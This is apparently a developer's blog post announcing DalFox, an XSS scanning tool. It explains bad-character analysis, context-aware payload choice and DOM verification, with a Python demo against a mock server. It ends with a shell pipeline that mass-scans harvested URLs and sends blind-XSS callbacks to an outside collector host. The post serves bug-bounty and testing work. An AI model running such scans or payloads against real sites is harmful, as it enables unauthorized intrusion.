DalFox: My New Weapon for XSS
Hi, hackers and bug bounty hunters!
Today I'm going to talk about my new XSS tool, DalFox. I'm sure there are still a lot of bugs because it's under development, but I'm going to write about it now because it's already somewhat functional and a critical bug has been fixed!
https://github.com/hahwul/dalfox
What is DalFox
It is a tool that analyzes parameters and scans for XSS, just like the existing XSpear. Most of XSpear's key features are inherited, and the new version addresses the chronic slowness and detection issues. And... there was a big change: from Ruby to Go.
These are the key features:
- Payload optimization based on parameter analysis
- Analysis of where the injected code lands (through abstraction), using a payload suited to that type
- DOM-based verification logic
- Pipeline support
(The README on GitHub is the most accurate reference.)
Optimization & Abstraction
Where XSpear used multiple testing queries, DalFox has a bad-char-based payload verification logic: it selects the queries to use for the actual test based on the data obtained from parameter testing. The abstraction concept mentioned above eventually divides the code into HTML and Script areas, as shown below, identifies where the injection landed, and uses the payload that matches that location.
(Figure: DalFox checks the HTML, JavaScript and Attribute contexts)
DOM Verify
In XSpear, a Selenium driver verified that the alert actually fired. This is a sure way to confirm a finding, but launching a headless browser is very slow, and the system becomes overloaded, especially when a huge amount of data has to be verified.
So in DalFox we boldly threw Selenium away and switched to a DOM-based verification method: if the actual object is found inserted in the DOM, it is treated as verified. Verified parameters do not need further testing, so the remaining payload queue is skipped (not tested).
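To make the two ideas above concrete (bad-char parameter analysis with context-aware payload selection, and DOM-based verification instead of a browser), here is an added example written for this post; it is not DalFox's own code. It assumes a hypothetical probe marker (dlfx/xfld), an inert <dlfx> marker element, a constructed payload table, and a constructed mock target that reflects a parameter into a page template, encoding only the characters you tell it to. It uses only Python's standard-library HTML parser.

```python
# Added example (not DalFox's own code): bad-char analysis, context-aware
# payload selection, and DOM-style verification against a constructed mock target.
from html.parser import HTMLParser

# Characters a breakout payload typically needs intact (constructed list).
BAD_CHARS = ['<', '>', '"', "'", '(', ')', '/', ';', '=']
PREFIX, SUFFIX = "dlfx", "xfld"     # hypothetical probe markers
MARK_TAG = "dlfx"                    # inert element used as the DOM marker

# Candidate payloads per reflection context and the bad chars each needs.
# They only insert an inert <dlfx> element; verification asks whether it
# landed in the DOM as an element rather than as text.
PAYLOADS = {
    "html":      [("<dlfx>", {"<", ">"})],
    "attribute": [('"><dlfx>', {'"', "<", ">"}),
                  ("'><dlfx>", {"'", "<", ">"})],
    "script":    [("</script><dlfx>", {"<", ">", "/"})],
}


class ReflectionFinder(HTMLParser):
    """Records where a marker is reflected: html text, attribute value or
    script body. Text is buffered and checked when the next tag arrives so a
    marker split across parser chunks is not missed."""

    def __init__(self, marker):
        super().__init__(convert_charrefs=True)
        self.marker, self.contexts = marker, []
        self._in_script, self._text = False, []

    def _flush(self):
        if self.marker in "".join(self._text):
            self.contexts.append("script" if self._in_script else "html")
        self._text = []

    def handle_starttag(self, tag, attrs):
        self._flush()
        if tag == "script":
            self._in_script = True
        if any(v and self.marker in v for _, v in attrs):
            self.contexts.append("attribute")

    def handle_endtag(self, tag):
        self._flush()
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        self._text.append(data)

    def close(self):
        super().close()
        self._flush()


def find_contexts(body, marker):
    p = ReflectionFinder(marker)
    p.feed(body)
    p.close()
    return p.contexts


class ElementCounter(HTMLParser):
    """Counts real start tags named `tag`; encoded text or a tag inside a
    <script> body is not counted, which is the point of DOM verification."""

    def __init__(self, tag):
        super().__init__()
        self.tag, self.count = tag, 0

    def handle_starttag(self, tag, attrs):
        if tag == self.tag:
            self.count += 1


def dom_verified(body, tag=MARK_TAG):
    c = ElementCounter(tag)
    c.feed(body)
    c.close()
    return c.count > 0


def surviving_bad_chars(send):
    """Probe each bad char once; keep those reflected back unchanged."""
    alive = []
    for ch in BAD_CHARS:
        probe = PREFIX + ch + SUFFIX
        if probe in send(probe):
            alive.append(ch)
    return alive


def scan(send):
    """One parameter: locate reflections, analyze bad chars, then try only the
    payloads that fit the context and stop at the first verified one."""
    contexts = find_contexts(send(PREFIX + SUFFIX), PREFIX + SUFFIX)
    alive = set(surviving_bad_chars(send))
    found = []
    for ctx in contexts:
        for payload, needs in PAYLOADS.get(ctx, []):
            if needs <= alive and dom_verified(send(payload)):
                found.append((ctx, payload))
                break                  # verified: skip the rest of the queue
    return found


def mock_server(template, escape_chars=""):
    """Constructed stand-in for a target: reflects the value into the template,
    HTML-encoding only the characters listed in escape_chars."""
    def send(value):
        for ch in escape_chars:
            value = value.replace(ch, "&#%d;" % ord(ch))
        return template.replace("{{V}}", value)
    return send


if __name__ == "__main__":
    for tpl, esc in [('<input value="{{V}}">', ""),
                     ("<input value='{{V}}'>", '"'),
                     ("<p>Hello {{V}}</p>", "<>"),
                     ('<script>var q = "{{V}}";</script>', "")]:
        print(tpl, "->", scan(mock_server(tpl, esc)))
```

The single-quoted attribute case shows the optimization: because the probe reveals that `"` is encoded, the double-quote payload is never sent at all, and once the single-quote payload is verified the queue stops. The `<p>` case with `<` and `>` encoded shows the other side: no payload can satisfy its bad-char requirements, so nothing is sent and nothing is reported.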
Pipeline
In DalFox I paid a little more attention to how input values are taken (io, file, arg) and how output is logged, so that it fits into a pipeline in general. By default, scan logging provides a variety of data, such as code views and the actual payloads, but with the pipeline option only the attack query is printed.
So, just a simple pipeline tip :D
cat target_list | waybackurls -no-subs | grep "https://" | \
grep -v "png\|jpg\|css\|js\|gif\|txt" | grep "=" | qsreplace | \
qsreplace -a | dalfox -pipe -blind https://hahwul.xss.ht
Finally
Since last year I have been changing my main language from Ruby to Go, and now I have finally converted my biggest (public) project. There may still be many bugs, but if you use it and have suggestions or find bugs, please file them as GitHub issues. And finally, about the name: the "Dal" in DalFox is the Korean pronunciation of "moon".
// and Fox = Finder of XSS. Haha, happy hacking!